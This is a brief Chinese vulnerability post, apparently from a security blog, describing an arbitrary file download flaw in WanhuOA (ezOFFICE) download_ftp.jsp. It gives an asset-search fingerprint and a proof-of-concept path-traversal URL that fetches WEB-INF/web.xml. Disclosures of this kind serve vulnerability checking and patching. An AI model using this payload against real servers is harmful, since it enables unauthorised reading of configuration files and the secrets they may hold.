WanhuOA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件
WanhuOA
app="Wanhu网络-ezOFFICE"
产品页面
验证POC
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!